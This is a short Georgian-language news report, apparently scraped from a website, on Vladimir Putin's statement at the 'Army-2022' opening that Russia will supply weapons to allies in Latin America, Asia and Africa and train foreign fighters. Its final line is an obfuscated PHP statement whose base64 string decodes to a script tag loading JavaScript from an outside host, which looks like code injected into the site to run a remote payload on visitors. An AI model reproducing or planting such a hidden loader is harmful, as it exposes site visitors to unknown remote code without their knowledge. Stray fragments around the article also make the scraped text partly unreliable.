celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტ, ვლადიმერ პუტინის თქმით, მზად არიან მიაწოდონ სამხედრო აღჭურვილობა მოკავშირე ქვეყნებს ლათინო ამერიკაში, აზიასა და აფრიკაში, ასევე, მოსკოვი ღიაა უცხოელი მებრძოლების მომზადებისთვის. ამ თემაზე მან "არმია-2022"-ის გახსნის ცერემონიაზე ისაუბრა. 
 
"რუსეთი გულწრფელად აფასებს ისტორიულად ძლიერ, მეგობრულ, ჭეშმარიტად სანდო კავშირებს ლათინური ამერიკის, აზიისა და აფრიკის ქვეყნებთან. (ჩვენ) მზად ვართ შევთავაზოთ ჩვენს მოკავშირეებს ყველაზე თანამედროვე ტიპის იარაღები, მცირე იარაღიდან ჯავშანტექნიკამდე, არტილერია და უპილოტო საფრენი აპარატები", - თქვა პუტინმა.
 
მისივე მტკიცებით, რუსეთს ბევრი მოკავშირე, პარტნიორი და თანამოაზრე ჰყავს სხვადასხვა კონტინენტზე. პუტინის განცხადებით, რუსეთი იწვევს მოკავშირეებს ერთობლივი სამხედრო წვრთნების ჩასატარებლად.
 
ცნობისთვის, რუსეთის მიერ უკრაინაში ომის დაწყებას დასავლეთი და ცივილიზებული ქვეყნები გმობენ. მათ მოსკოვს, ასევე პუტინსა და მის გარემოცვას არაერთი მიმართულებით სანქციები დაუწესეს. დასავლეთი მხარს უჭერს უკრაინას და ეხმარება როგორც სამხედრო, ისე ჰუმანიტარულ, ეკონომიკურ თუ სხვა მიმართულებებში.
908
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");